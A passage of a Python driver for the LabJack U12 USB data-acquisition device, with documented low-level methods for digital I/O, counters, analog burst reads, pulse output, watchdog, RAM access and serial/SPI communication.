returnDict['Channel1'] = self.bitsToVolts(channel1Number, channel1Gain, channel1)
channel2 = (channel2 << 8) + results[6]
returnDict['Channel2'] = self.bitsToVolts(channel2Number, channel2Gain, channel2)
channel3 = (channel3 << 8) + results[7]
returnDict['Channel3'] = self.bitsToVolts(channel3Number, channel3Gain, channel3)
return returnDict
def rawDIO(self, D15toD8Directions = 0, D7toD0Directions = 0, D15toD8States = 0, D7toD0States = 0, IO3toIO0DirectionsAndStates = 0, UpdateDigital = False):
"""
Name: U12.rawDIO(D15toD8Directions = 0, D7toD0Directions = 0,
D15toD8States = 0, D7toD0States = 0,
IO3toIO0DirectionsAndStates = 0, UpdateDigital = 1)
Args: D15toD8Directions, A byte where 0 = Output, 1 = Input for D15-8
D7toD0Directions, A byte where 0 = Output, 1 = Input for D7-0
D15toD8States, A byte where 0 = Low, 1 = High for D15-8
D7toD0States, A byte where 0 = Low, 1 = High for D7-0
IO3toIO0DirectionsAndStates, Bits 7-4: Direction, 3-0: State
UpdateDigital, True if you want to update the IO/D line. False to
False to just read their values.
Desc: This commands reads the direction and state of all the digital
I/O. See Section 5.2 of the U12 User's Guide.
By default, it just reads the directions and states.
Returns: A dictionary with the following keys:
D15toD8Directions, a BitField representing the directions of D15-D8
D7toD0Directions, a BitField representing the directions of D7-D0.
D15toD8States, a BitField representing the states of D15-D8.
D7toD0States, a BitField representing the states of D7-D0.
IO3toIO0States, a BitField representing the states of IO3-IO0.
D15toD8OutputLatchStates, BitField of output latch states for D15-8
D7toD0OutputLatchStates, BitField of output latch states for D7-0
Example:
>>> import u12
>>> d = u12.U12()
>>> d.rawDIO()
{
'D15toD8Directions':
<BitField object: [ D15 = Input (1), D14 = Input (1),
D13 = Input (1), D12 = Input (1),
D11 = Input (1), D10 = Input (1),
D9 = Input (1), D8 = Input (1) ] >,
'D7toD0Directions':
<BitField object: [ D7 = Input (1), D6 = Input (1), D5 = Input (1),
D4 = Input (1), D3 = Input (1), D2 = Input (1),
D1 = Input (1), D0 = Input (1) ] >,
'D15toD8States':
<BitField object: [ D15 = Low (0), D14 = Low (0), D13 = Low (0),
D12 = Low (0), D11 = Low (0), D10 = Low (0),
D9 = Low (0), D8 = Low (0) ] >,
'D7toD0States':
<BitField object: [ D7 = Low (0), D6 = Low (0), D5 = Low (0),
D4 = Low (0), D3 = Low (0), D2 = Low (0),
D1 = Low (0), D0 = Low (0) ] >,
'IO3toIO0States':
<BitField object: [ IO3 = Low (0), IO2 = Low (0), IO1 = Low (0),
IO0 = Low (0) ] >,
'D15toD8OutputLatchStates':
<BitField object: [ D15 = 0 (0), D14 = 0 (0), D13 = 0 (0),
D12 = 0 (0), D11 = 0 (0), D10 = 0 (0),
D9 = 0 (0), D8 = 0 (0) ] >,
'D7toD0OutputLatchStates':
<BitField object: [ D7 = 0 (0), D6 = 0 (0), D5 = 0 (0), D4 = 0 (0),
D3 = 0 (0), D2 = 0 (0), D1 = 0 (0),
D0 = 0 (0) ] >
}
"""
command = [ 0 ] * 8
# Bits for D15 through D8 Direction
command[0] = int(D15toD8Directions)
# Bits for D7 through D0 Direction ( 0 = Output, 1 = Input)
command[1] = int(D7toD0Directions)
# Bits for D15 through D8 State ( 0 = Low, 1 = High)
command[2] = int(D15toD8States)
# Bits for D7 through D0 State ( 0 = Low, 1 = High)
command[3] = int(D7toD0States)
# Bits 7-4: Bits for IO3 through IO0 Direction
# Bits 3-0: Bits for IO3 through IO0 State
command[4] = int(IO3toIO0DirectionsAndStates)
# 01X10111 (DIO)
command[5] = 0x57 # 0b01010111
# Bit 0: Update Digital
command[6] = int(bool(UpdateDigital))
#XXXXXXXX
# command[7] = XXXXXXXX
self.write(command)
results = self.read()
returnDict = {}
if results[0] != 87:
raise U12Exception("Expected a DIO response, got %s instead." % results[0])
returnDict['D15toD8States'] = BitField(results[1], "D", range(15, 7, -1), "Low", "High")
returnDict['D7toD0States'] = BitField(results[2], "D", range(7, -1, -1), "Low", "High")
returnDict['D15toD8Directions'] = BitField(results[4], "D", range(15, 7, -1), "Output", "Input")
returnDict['D7toD0Directions'] = BitField(results[5], "D", range(7, -1, -1), "Output", "Input")
returnDict['D15toD8OutputLatchStates'] = BitField(results[6], "D", range(15, 7, -1))
returnDict['D7toD0OutputLatchStates'] = BitField(results[7], "D", range(7, -1, -1))
returnDict['IO3toIO0States'] = BitField((results[3] >> 4), "IO", range(3, -1, -1), "Low", "High")
return returnDict
def rawCounter(self, StrobeEnabled = False, ResetCounter = False):
"""
Name: U12.rawCounter(StrobeEnabled = False, ResetCounter = False)
Args: StrobeEnable, set to True to enable strobe.
ResetCounter, set to True to reset the counter AFTER reading.
Desc: This command controls and reads the 32-bit counter. See
Section 5.3 of the User's Guide.
Returns: A dictionary with the following keys:
D15toD8States, a BitField representing the states of D15-D8.
D7toD0States, a BitField representing the states of D7-D0.
IO3toIO0States, a BitField representing the states of IO3-IO0.
Counter, the value of the counter
Example:
>>> import u12
>>> d = u12.U12()
>>> d.rawCounter()
{
'D15toD8States':
<BitField object: [ D15 = Low (0), D14 = Low (0), D13 = Low (0),
D12 = Low (0), D11 = Low (0), D10 = Low (0),
D9 = Low (0), D8 = Low (0) ] >,
'D7toD0States':
<BitField object: [ D7 = Low (0), D6 = Low (0), D5 = Low (0),
D4 = Low (0), D3 = Low (0), D2 = Low (0),
D1 = Low (0), D0 = Low (0) ] >,
'IO3toIO0States':
<BitField object: [ IO3 = Low (0), IO2 = Low (0), IO1 = Low (0),
IO0 = Low (0) ] >,
'Counter': 0
}
"""
command = [ 0 ] * 8
bf = BitField()
bf.bit1 = int(StrobeEnabled)
bf.bit0 = int(ResetCounter)
command[0] = int(bf)
bf.fromByte(0)
bf.bit6 = 1
bf.bit4 = 1
bf.bit1 = 1
command[5] = int(bf)
self.write(command)
results = self.read()
returnDict = {}
if results[0] != command[5]:
raise U12Exception("Expected a Counter response, got %s instead." % results[0])
returnDict['D15toD8States'] = BitField(results[1], "D", range(15, 7, -1), "Low", "High")
returnDict['D7toD0States'] = BitField(results[2], "D", range(7, -1, -1), "Low", "High")
returnDict['IO3toIO0States'] = BitField((results[3] >> 4), "IO", range(3, -1, -1), "Low", "High")
counter = results[7]
counter += results[6] << 8
counter += results[5] << 16
counter += results[4] << 24
returnDict['Counter'] = counter
return returnDict
def rawCounterPWMDIO(self, D15toD8Directions = 0, D7toD0Directions = 0, D15toD8States = 0, D7toD0States = 0, IO3toIO0DirectionsAndStates = 0, ResetCounter = False, UpdateDigital = 0, PWMA = 0, PWMB = 0):
"""
Name: U12.rawCounterPWMDIO( D15toD8Directions = 0, D7toD0Directions = 0,
D15toD8States = 0, D7toD0States = 0,
IO3toIO0DirectionsAndStates = 0,
ResetCounter = False, UpdateDigital = 0,
PWMA = 0, PWMB = 0)
Args: D15toD8Directions, A byte where 0 = Output, 1 = Input for D15-8
D7toD0Directions, A byte where 0 = Output, 1 = Input for D7-0
D15toD8States, A byte where 0 = Low, 1 = High for D15-8
D7toD0States, A byte where 0 = Low, 1 = High for D7-0
IO3toIO0DirectionsAndStates, Bits 7-4: Direction, 3-0: State
ResetCounter, If True, reset the counter after reading.
UpdateDigital, True if you want to update the IO/D line. False to
False to just read their values.
PWMA, Voltage to set AO0 to output.
PWMB, Voltage to set AO1 to output.
Desc: This command controls all 20 digital I/O, and the 2 PWM outputs.
The response provides the state of all I/O and the current count.
See Section 5.4 of the User's Guide.
By default, sets the AOs to 0 and reads the states and counters.
Returns: A dictionary with the following keys:
D15toD8States, a BitField representing the states of D15-D8.
D7toD0States, a BitField representing the states of D7-D0.
IO3toIO0States, a BitField representing the states of IO3-IO0.
Counter, the value of the counter
Example:
>>> import u12
>>> d = u12.U12()
>>> d.rawCounterPWMDIO()
{
'D15toD8States':
<BitField object: [ D15 = Low (0), D14 = Low (0), D13 = Low (0),
D12 = Low (0), D11 = Low (0), D10 = Low (0),
D9 = Low (0), D8 = Low (0) ] >,
'D7toD0States':
<BitField object: [ D7 = Low (0), D6 = Low (0), D5 = Low (0),
D4 = Low (0), D3 = Low (0), D2 = Low (0),
D1 = Low (0), D0 = Low (0) ] >,
'IO3toIO0States':
<BitField object: [ IO3 = Low (0), IO2 = Low (0),
IO1 = Low (0), IO0 = Low (0) ] >,
'Counter': 0
}
"""
command = [ 0 ] * 8
# Bits for D15 through D8 Direction
command[0] = int(D15toD8Directions)
# Bits for D7 through D0 Direction ( 0 = Output, 1 = Input)
command[1] = int(D7toD0Directions)
# Bits for D15 through D8 State ( 0 = Low, 1 = High)
command[2] = int(D15toD8States)
# Bits for D7 through D0 State ( 0 = Low, 1 = High)
command[3] = int(D7toD0States)
# Bits 7-4: Bits for IO3 through IO0 Direction
# Bits 3-0: Bits for IO3 through IO0 State
command[4] = int(IO3toIO0DirectionsAndStates)
bf = BitField()
bf.bit5 = int(ResetCounter)
bf.bit4 = int(UpdateDigital)
binPWMA = int((1023 * (float(PWMA)/5.0)))
binPWMB = int((1023 * (float(PWMB)/5.0)))
bf2 = BitField()
bf2.fromByte( binPWMA & 3 ) # 3 = 0b11
bf.bit3 = bf2.bit1
bf.bit2 = bf2.bit0
bf2.fromByte( binPWMB & 3 ) # 3 = 0b11
bf.bit1 = bf2.bit1
bf.bit0 = bf2.bit0
command[5] = int(bf)
command[6] = (binPWMA >> 2) & 0xff
command[7] = (binPWMB >> 2) & 0xff
self.write(command)
results = self.read()
returnDict = {}
returnDict['D15toD8States'] = BitField(results[1], "D", range(15, 7, -1), "Low", "High")
returnDict['D7toD0States'] = BitField(results[2], "D", range(7, -1, -1), "Low", "High")
returnDict['IO3toIO0States'] = BitField((results[3] >> 4), "IO", range(3, -1, -1), "Low", "High")
counter = results[7]
counter += results[6] << 8
counter += results[5] << 16
counter += results[4] << 24
returnDict['Counter'] = counter
return returnDict
def rawAIBurst(self, channel0PGAMUX = 8, channel1PGAMUX = 9, channel2PGAMUX = 10, channel3PGAMUX = 11, NumberOfScans = 8, TriggerIONum = 0, TriggerState = 0, UpdateIO = False, LEDState = True, IO3ToIO0States = 0, FeatureReports = False, TriggerOn = False, SampleInterval = 15000):
"""
Name: U12.rawAIBurst( channel0PGAMUX = 8, channel1PGAMUX = 9,
channel2PGAMUX = 10, channel3PGAMUX = 11,
NumberOfScans = 8, TriggerIONum = 0,
TriggerState = 0, UpdateIO = False,
LEDState = True, IO3ToIO0States = 0,
FeatureReports = False, TriggerOn = False,
SampleInterval = 15000 )
Args: channel0PGAMUX, A byte that contains channel0 information
channel1PGAMUX, A byte that contains channel1 information
channel2PGAMUX, A byte that contains channel2 information
channel3PGAMUX, A byte that contains channel3 information
NumberOfScans, The number of scans you wish to take. Rounded up
to a power of 2.
TriggerIONum, IO to trigger burst on.
TriggerState, State to trigger on.
UpdateIO, True if you want to update the IO/D line. False to
False to just read their values.
LEDState, Turns the status LED on or off.
IO3ToIO0States, 4 bits for IO3-0 states
FeatureReports, Use feature reports, or not.
TriggerOn, Use trigger to start acquisition.
SampleInterval, = int(6000000.0/(ScanRate * NumberOfChannels))
must be greater than (or equal to) 733.
Desc: After receiving a AIBurst command, the LabJack collects 4
channels at the specified data rate, and puts data in the buffer.
This continues until the buffer is full, at which time the
LabJack starts sending the data to the host. Data is sent to the
host 1 scan at a time while checking for a command from the host.
If a command is received the burst operation is canceled and the
command is executed normally. If the LED is enabled, it blinks at
4 Hz while waiting for a trigger, is off during acquisition,
blinks at about 8 Hz during data delivery, and is set on when
done or stopped. See Section 5.5 of the User's Guide.
This function sends the AIBurst command, then reads all the
responses. Separating the write and read is not currently
supported (like in the UW driver).
By default, it does single-ended readings on AI0-4 at 100Hz for 8
scans.
Returns: A dictionary with the following keys:
Channel0-3, A list of the readings on the channels
PGAOvervoltages, A list of the over-voltage flags
IO3toIO0State, A list of the IO states
IterationCounters, A list of the values of the iteration counter
Backlogs, value*256 = number of packets in the backlog.
BufferOverflowOrChecksumErrors, If True and Backlog = 31,
then a buffer overflow occurred. If
True and Backlog = 0, then Checksum
error occurred.
Example:
>>> import u12
>>> d = u12.U12()
>>> d.rawAIBurst()
{
'Channel0': [1.484375, 1.513671875, ... , 1.46484375],
'Channel1': [1.455078125, 1.455078125, ... , 1.455078125],
'Channel2': [1.46484375, 1.474609375, ... , 1.46484375],
'Channel3': [1.435546875, 1.42578125, ... , 1.435546875],
'PGAOvervoltages': [False, False, ..., False],
'IO3toIO0States':
[<BitField object: [ IO3 = Low (0), IO2 = Low (0), IO1 = Low (0),
IO0 = Low (0) ] >, ... ],
'IterationCounters': [0, 1, 2, 3, 4, 5, 6, 0],
'Backlogs': [0, 0, 0, 0, 0, 0, 0, 0],
'BufferOverflowOrChecksumErrors': [False, False, ... , False]
}
"""
command = [ 0 ] * 8
# Bits 6-4: PGA for 1st Channel
# Bits 3-0: MUX command for 1st Channel
command[0] = int(channel0PGAMUX)
tempNum = command[0] & 7 # 7 = 0b111
channel0Number = tempNum if (command[0] & 0xf) > 7 else tempNum+8
channel0Gain = (command[0] >> 4) & 7 # 7 = 0b111
command[1] = int(channel1PGAMUX)
tempNum = command[1] & 7 # 7 = 0b111
channel1Number = tempNum if (command[1] & 0xf) > 7 else tempNum+8
channel1Gain = (command[1] >> 4) & 7 # 7 = 0b111
command[2] = int(channel2PGAMUX)
tempNum = command[2] & 7 # 7 = 0b111
channel2Number = tempNum if (command[2] & 0xf) > 7 else tempNum+8
channel2Gain = (command[2] >> 4) & 7 # 7 = 0b111
command[3] = int(channel3PGAMUX)
tempNum = command[3] & 7 # 7 = 0b111
channel3Number = tempNum if (command[3] & 0xf) > 7 else tempNum+8
channel3Gain = (command[3] >> 4) & 7 # 7 = 0b111
if NumberOfScans > 1024 or NumberOfScans < 8:
raise U12Exception("The number of scans must be between 1024 and 8 (inclusive)")
NumScansExponentMod = 10 - int(math.ceil(math.log(NumberOfScans, 2)))
NumScans = 2 ** (10 - NumScansExponentMod)
bf = BitField( rawByte = (NumScansExponentMod << 5) )
# bits 4-3: IO to Trigger on
bf.bit2 = 0
bf.bit1 = int(bool(UpdateIO))
bf.bit0 = int(bool(LEDState))
command[4] = int(bf)
bf2 = BitField(rawByte = int(IO3ToIO0States))
#Bits 7-4: 1010 (Start Burst)
bf2.bit7 = 1
bf2.bit5 = 1
command[5] = int(bf2)
if SampleInterval < 733:
raise U12Exception("SampleInterval must be greater than 733.")
bf3 = BitField( rawByte = ((SampleInterval >> 8) & 0xf) )
bf3.bit7 = int(bool(FeatureReports))
bf3.bit6 = int(bool(TriggerOn))
command[6] = int(bf3)
command[7] = SampleInterval & 0xff
self.write(command)
resultsList = []
for i in range(NumScans):
resultsList.append(self.read())
returnDict = {}
returnDict['BufferOverflowOrChecksumErrors'] = list()
returnDict['PGAOvervoltages'] = list()
returnDict['IO3toIO0States'] = list()
returnDict['IterationCounters'] = list()
returnDict['Backlogs'] = list()
returnDict['Channel0'] = list()
returnDict['Channel1'] = list()
returnDict['Channel2'] = list()
returnDict['Channel3'] = list()
for results in resultsList:
bf = BitField(rawByte = results[0])
if bf.bit7 != 1 or bf.bit6 != 0:
raise U12Exception("Expected a AIBurst response, got %s instead." % results[0])
returnDict['BufferOverflowOrChecksumErrors'].append(bool(bf.bit5))
returnDict['PGAOvervoltages'].append(bool(bf.bit4))
returnDict['IO3toIO0States'].append(BitField(results[0], "IO", range(3, -1, -1), "Low", "High"))
returnDict['IterationCounters'].append((results[1] >> 5))
returnDict['Backlogs'].append(results[1] & 0xf)
channel0 = (results[2] >> 4) & 0xf
channel1 = (results[2] & 0xf)
channel2 = (results[5] >> 4) & 0xf
channel3 = (results[5] & 0xf)
channel0 = (channel0 << 8) + results[3]
returnDict['Channel0'].append(self.bitsToVolts(channel0Number, channel0Gain, channel0))
channel1 = (channel1 << 8) + results[4]
returnDict['Channel1'].append(self.bitsToVolts(channel1Number, channel1Gain, channel1))
channel2 = (channel2 << 8) + results[6]
returnDict['Channel2'].append(self.bitsToVolts(channel2Number, channel2Gain, channel2))
channel3 = (channel3 << 8) + results[7]
returnDict['Channel3'].append(self.bitsToVolts(channel3Number, channel3Gain, channel3))
return returnDict
def rawAIContinuous(self, channel0PGAMUX = 8, channel1PGAMUX = 9, channel2PGAMUX = 10, channel3PGAMUX = 11, FeatureReports = False, CounterRead = False, UpdateIO = False, LEDState = True, IO3ToIO0States = 0, SampleInterval = 15000):
"""
Currently in development.
The function is mostly implemented, but is currently too slow to be
useful.
"""
command = [ 0 ] * 8
# Bits 6-4: PGA for 1st Channel
# Bits 3-0: MUX command for 1st Channel
command[0] = int(channel0PGAMUX)
tempNum = command[0] & 7 # 7 = 0b111
channel0Number = tempNum if (command[0] & 0xf) > 7 else tempNum+8
channel0Gain = (command[0] >> 4) & 7 # 7 = 0b111
command[1] = int(channel1PGAMUX)
tempNum = command[1] & 7 # 7 = 0b111
channel1Number = tempNum if (command[1] & 0xf) > 7 else tempNum+8
channel1Gain = (command[1] >> 4) & 7 # 7 = 0b111
command[2] = int(channel2PGAMUX)
tempNum = command[2] & 7 # 7 = 0b111
channel2Number = tempNum if (command[2] & 0xf) > 7 else tempNum+8
channel2Gain = (command[2] >> 4) & 7 # 7 = 0b111
command[3] = int(channel3PGAMUX)
tempNum = command[3] & 7 # 7 = 0b111
channel3Number = tempNum if (command[3] & 0xf) > 7 else tempNum+8
channel3Gain = (command[3] >> 4) & 7 # 7 = 0b111
bf = BitField()
bf.bit7 = int(bool(FeatureReports))
bf.bit6 = int(bool(CounterRead))
bf.bit1 = int(bool(UpdateIO))
bf.bit0 = int(bool(LEDState))
command[4] = int(bf)
# Bits 7-4: 1001 (Start Continuous)
bf2 = BitField( rawByte = int(IO3ToIO0States) )
bf2.bit7 = 1
bf2.bit4 = 1
command[5] = int(bf2)
command[6] = ( SampleInterval >> 8)
command[7] = SampleInterval & 0xff
byte0bf = BitField()
returnDict = dict()
self.write(command)
while True:
results = self.read()
byte0bf.fromByte(results[0])
returnDict['Byte0'] = byte0bf
returnDict['IterationCounter'] = (results[1] >> 5)
returnDict['Backlog'] = results[1] & 0xf
yield returnDict
def rawPulseout(self, B1 = 10, C1 = 2, B2 = 10, C2 = 2, D7ToD0PulseSelection = 1, ClearFirst = False, NumberOfPulses = 5):
"""
Name: U12.rawPulseout( B1 = 10, C1 = 2, B2 = 10, C2 = 2,
D7ToD0PulseSelection = 1, ClearFirst = False,
NumberOfPulses = 5)
Args: B1, the B component of the first half cycle
C1, the C component of the first half cycle
B2, the B component of the second half cycle
C2, the C component of the second half cycle
D7ToD0PulseSelection, which D lines to pulse.
ClearFirst, True = Start Low.
NumberOfPulses, the number of pulses
Desc: This command creates pulses on any, or all, of D0-D7. The desired
D lines must be set to output with some other function. See
Section 5.7 of the User's Guide.
By default, pulses D0 5 times at 400us high, then 400 us low.
Returns: None
Example:
Have a jumper wire connected from D0 to CNT.
>>> import u12
>>> d = u12.U12()
>>> d.rawDIO(D7toD0Directions = 0, UpdateDigital = True)
>>> d.rawCounter(ResetCounter = True)
>>> d.rawPulseout(ClearFirst = True)
>>> print d.rawCounter()
{ 'IO3toIO0States': ... ,
'Counter': 5,
'D7toD0States': ... ,
'D15toD8States': ...
}
"""
command = [ 0 ] * 8
command[0] = B1
command[1] = C1
command[2] = B2
command[3] = C2
command[4] = int(D7ToD0PulseSelection)
# 01100100 (Pulseout)
bf = BitField()
bf.bit6 = 1
bf.bit5 = 1
bf.bit2 = 1
command[5] = int(bf)
bf2 = BitField( rawByte = ( NumberOfPulses >> 8 ) )
bf2.bit7 = int(bool(ClearFirst))
command[6] = int(bf2)
command[7] = NumberOfPulses & 0xff
self.write(command)
results = self.read()
if command[5] != results[5]:
raise U12Exception("Expected Pulseout response, got %s instead." % results[5])
if results[4] != 0:
errors = BitField(rawByte = command[4], labelPrefix = "D", zeroLabel = "Ok", oneLabel = "Error")
raise U12Exception("D7-D0 Direction error detected: %s" % errors)
return None
def rawReset(self):
"""
Name: U12.rawReset()
Desc: Sits in an infinite loop until micro watchdog timeout after about
2 seconds. See Section 5.8 of the User's Guide.
Note: The function will close the device after it has written the
command.
Returns: None
Example:
>>> import u12
>>> d = u12.U12()
>>> d.rawReset()
"""
command = [ 0 ] * 8
# 0b01011111 ( Reset )
bf = BitField()
bf.bit6 = 1
bf.bit4 = 1
bf.bit3 = 1
bf.bit2 = 1
bf.bit1 = 1
bf.bit0 = 1
command[5] = int(bf)
self.write(command)
self.close()
def rawReenumerate(self):
"""
Name: U12.rawReenumerate()
Desc: Detaches from the USB, reloads config parameters, and then
reattaches so the device can be re-enumerated. See Section 5.9 of
the User's Guide.
Note: The function will close the device after it has written the
command.
Returns: None
Example:
>>> import u12
>>> d = u12.U12()
>>> d.rawReenumerate()
"""
command = [ 0 ] * 8
# 0b01000000 (Re-Enumerate)
bf = BitField()
bf.bit6 = 1
command[5] = int(bf)
self.write(command)
self.close()
def rawWatchdog(self, IgnoreCommands = False, D0Active = False, D0State = False, D1Active = False, D1State = False, D8Active = False, D8State = False, ResetOnTimeout = False, WatchdogActive = False, Timeout = 60):
"""
Name: U12.rawWatchdog( IgnoreCommands = False, D0Active = False,
D0State = False, D1Active = False,
D1State = False, D8Active = False,
D8State = False, ResetOnTimeout = False,
WatchdogActive = False, Timeout = 60)
Desc: Sets the settings for the watchdog, or just reads the firmware
version of the U12. See section 5.10 of the User's Guide.
By defaults, just reads the firmware version.
Returns: A dictionary with the following keys:
FirmwareVersion, the firmware version of the U12.
Example:
>>> import u12
>>> d = u12.U12()
>>> print d.rawWatchdog()
{'FirmwareVersion': '1.10'}
"""
command = [ 0 ] * 8
command[0] = int(bool(IgnoreCommands))
bf = BitField()
bf.bit7 = int(D0Active)
bf.bit6 = int(D0State)
bf.bit5 = int(D1Active)
bf.bit4 = int(D1State)
bf.bit3 = int(D8Active)
bf.bit2 = int(D8State)
bf.bit1 = int(ResetOnTimeout)
bf.bit0 = int(WatchdogActive)
command[4] = int(bf)
# 01X1X011 (Watchdog)
bf2 = BitField()
bf2.bit6 = 1
bf2.bit4 = 1
bf2.bit1 = 1
bf2.bit0 = 1
command[5] = int(bf2)
# Timeout is increments of 2^16 cycles.
# 2^16 cycles is about 0.01 seconds.
binTimeout = int((float(Timeout) / 0.01))
command[6] = ( binTimeout >> 8 ) & 0xff
command[7] = binTimeout & 0xff
self.write(command)
results = self.read()
returnDict = dict()
returnDict['FirmwareVersion'] = "%s.%.2d" % (results[0], results[1])
return returnDict
def rawReadRAM(self, Address = 0):
"""
Name: U12.rawReadRAM(Address = 0)
Args: Address, the starting address to read from
Desc: Reads 4 bytes out of the U12's internal memory. See section 5.11
of the User's Guide.
By default, reads the bytes that make up the serial number.
Returns: A dictionary with the following keys:
DataByte0, the data byte at Address - 0
DataByte1, the data byte at Address - 1
DataByte2, the data byte at Address - 2
DataByte3, the data byte at Address - 3
Example:
>>> import u12, struct
>>> d = u12.U12()
>>> r = d.rawReadRAM()
>>> print r
{'DataByte3': 5, 'DataByte2': 246, 'DataByte1': 139, 'DataByte0': 170}
>>> bytes = [ r['DataByte3'], r['DataByte2'], r['DataByte1'], r['DataByte0'] ]
>>> print struct.unpack(">I", struct.pack("BBBB", *bytes))[0]
100043690
"""
command = [ 0 ] * 8
# 01010000 (Read RAM)
bf = BitField()
bf.bit6 = 1
bf.bit4 = 1
command[5] = int(bf)
command[6] = (Address >> 8) & 0xff
command[7] = Address & 0xff
self.write(command)
results = self.read()
if results[0] != int(bf):
raise U12Exception("Expected ReadRAM response, got %s" % results[0])
if (results[6] != command[6]) or (results[7] != command[7]):
receivedAddress = (results[6] << 8) + results[7]
raise U12Exception("Wanted address %s got address %s" % (Address, receivedAddress))
returnDict = dict()
returnDict['DataByte3'] = results[1]
returnDict['DataByte2'] = results[2]
returnDict['DataByte1'] = results[3]
returnDict['DataByte0'] = results[4]
return returnDict
def rawWriteRAM(self, Data, Address):
"""
Name: U12.rawWriteRAM(Data, Address)
Args: Data, a list of 4 bytes to write to memory.
Address, the starting address to write to.
Desc: Writes 4 bytes to the U12's internal memory. See section 5.13 of
the User's Guide.
No default behavior, you must pass Data and Address.
Returns: A dictionary with the following keys:
DataByte0, the data byte at Address - 0
DataByte1, the data byte at Address - 1
DataByte2, the data byte at Address - 2
DataByte3, the data byte at Address - 3
Example:
>>> import u12
>>> d = u12.U12()
>>> print d.rawWriteRAM([1, 2, 3, 4], 0x200)
{'DataByte3': 4, 'DataByte2': 3, 'DataByte1': 2, 'DataByte0': 1}
"""
command = [ 0 ] * 8
if not isinstance(Data, list) or len(Data) > 4:
raise U12Exception("Data wasn't a list, or was too long.")
Data.reverse()
command[:len(Data)] = Data
# 01010001 (Write RAM)
bf = BitField()
bf.bit6 = 1
bf.bit4 = 1
bf.bit0 = 1
command[5] = int(bf)
command[6] = (Address >> 8) & 0xff
command[7] = Address & 0xff
self.write(command)
results = self.read()
if results[0] != int(bf):
raise U12Exception("Expected ReadRAM response, got %s" % results[0])
if (results[6] != command[6]) or (results[7] != command[7]):
receivedAddress = (results[6] << 8) + results[7]
raise U12Exception("Wanted address %s got address %s" % (Address, receivedAddress))
returnDict = dict()
returnDict['DataByte3'] = results[1]
returnDict['DataByte2'] = results[2]
returnDict['DataByte1'] = results[3]
returnDict['DataByte0'] = results[4]
return returnDict
def rawAsynch(self, Data, AddDelay = False, TimeoutActive = False, SetTransmitEnable = False, PortB = False, NumberOfBytesToWrite = 0, NumberOfBytesToRead = 0):
"""
Name: U12.rawAsynch(Data, AddDelay = False, TimeoutActive = False,
SetTransmitEnable = False, PortB = False,
NumberOfBytesToWrite = 0, NumberOfBytesToRead = 0)
Args: Data, A list of bytes to write.
AddDelay, True to add a 1 bit delay between each transmit byte.
TimeoutActive, True to enable timeout for the receive phase.
SetTransmitEnable, True to set Transmit Enable to high during
transmit and low during receive.
PortB, True to use PortB instead of PortA.
NumberOfBytesToWrite, Number of bytes to write.
NumberOfBytesToRead, Number of bytes to read.
Desc: Requires firmware V1.1 or higher. This function writes and then
reads half-duplex asynchronous data on 1 of two pairs of D lines.
See section 5.13 of the User's Guide.
Returns: A dictionary with the following keys,
DataByte0-3, the first four data bytes read over the RX line
ErrorFlags, a BitField representing the error flags.
Example:
>>> import u12
>>> d = u12.U12()
>>> # Set the full and half A,B,C to 9600
>>> d.rawWriteRAM([0, 1, 1, 200], 0x073)
>>> d.rawWriteRAM([5, 1, 2, 48], 0x076)
>>> print d.rawAsynch([1, 2, 3, 4], NumberOfBytesToWrite = 4, NumberOfBytesToRead = 4)
{
'DataByte3': 4,
'DataByte2': 3,
'DataByte1': 2,
'DataByte0': 1,
'ErrorFlags': <BitField object: [ Timeout Error Flag = 0 (0), ... ] >
}
"""
command = [ 0 ] * 8
if not isinstance(Data, list) or len(Data) > 4:
raise U12Exception("Data wasn't a list, or was too long.")
NumberOfBytesToWrite = NumberOfBytesToRead & 0xff
NumberOfBytesToRead = NumberOfBytesToRead & 0xff
if NumberOfBytesToWrite > 18:
raise U12Exception("Can only write 18 or fewer bytes at a time.")
if NumberOfBytesToRead > 18:
raise U12Exception("Can only read 18 or fewer bytes at a time.")
Data.reverse()
command[:len(Data)] = Data
bf = BitField()
bf.bit3 = int(bool(AddDelay))
bf.bit2 = int(bool(TimeoutActive))
bf.bit1 = int(bool(SetTransmitEnable))
bf.bit0 = int(bool(PortB))
command[4] = int(bf)
#01100001 (Asynch)
bf2 = BitField()
bf2.bit6 = 1
bf2.bit5 = 1
bf2.bit0 = 1
command[5] = int(bf2)
command[6] = NumberOfBytesToWrite
command[7] = NumberOfBytesToRead
self.write(command)
results = self.read()
if command[5] != results[5]:
raise U12Exception("Expected Asynch response, got %s instead." % results[5])
returnDict = dict()
returnDict['DataByte3'] = results[0]
returnDict['DataByte2'] = results[1]
returnDict['DataByte1'] = results[2]
returnDict['DataByte0'] = results[3]
bfLabels = ["Timeout Error Flag", "STRT Error Flag", "FRM Error Flag", "RXTris Error Flag", "TETris Error Flag", "TXTris Error Flag"]
bf = BitField( rawByte = results[4], labelPrefix = "", labelList = bfLabels )
returnDict["ErrorFlags"] = bf
return returnDict
SPIModes = ['A', 'B', 'C', 'D']
def rawSPI(self, Data, AddMsDelay = False, AddHundredUsDelay = False, SPIMode = 'A', NumberOfBytesToWriteRead = 0, ControlCS = False, StateOfActiveCS = False, CSLineNumber = 0):
"""
Name: U12.rawSPI( Data, AddMsDelay = False, AddHundredUsDelay = False,
SPIMode = 'A', NumberOfBytesToWriteRead = 0,
ControlCS = False, StateOfActiveCS = False,
CSLineNumber = 0)
Args: Data, A list of four bytes to write using SPI
AddMsDelay, If True, a 1 ms delay is added between each bit
AddHundredUsDelay, if True, 100us delay is added
SPIMode, 'A', 'B', 'C', or 'D'
NumberOfBytesToWriteRead, number of bytes to write and read.
ControlCS, D0-D7 is automatically controlled as CS. The state and
direction of CS is only tested if control is enabled.
StateOfActiveCS, Active state for CS line.
CSLineNumber, D line to use as CS if enabled (0-7).
Desc: This function performs SPI communication. See Section 5.14 of the
User's Guide.
Returns: A dictionary with the following keys,
DataByte0-3, the first four data bytes read
ErrorFlags, a BitField representing the error flags.
Example:
>>> import u12
>>> d = u12.U12()
>>> d.rawSPI([1,2,3,4], NumberOfBytesToWriteRead = 4)
{
'DataByte3': 4,
'DataByte2': 3,
'DataByte1': 2,
'DataByte0': 1,
'ErrorFlags':
<BitField object: [ CSStateTris Error Flag = 0 (0), ... ] >
}
"""
command = [ 0 ] * 8
if not isinstance(Data, list) or len(Data) > 4:
raise U12Exception("Data wasn't a list, or was too long.")
NumberOfBytesToWriteRead = NumberOfBytesToWriteRead & 0xff
if NumberOfBytesToWriteRead == 0:
NumberOfBytesToWriteRead = len(Data)
if NumberOfBytesToWriteRead > 18 or NumberOfBytesToWriteRead < 1:
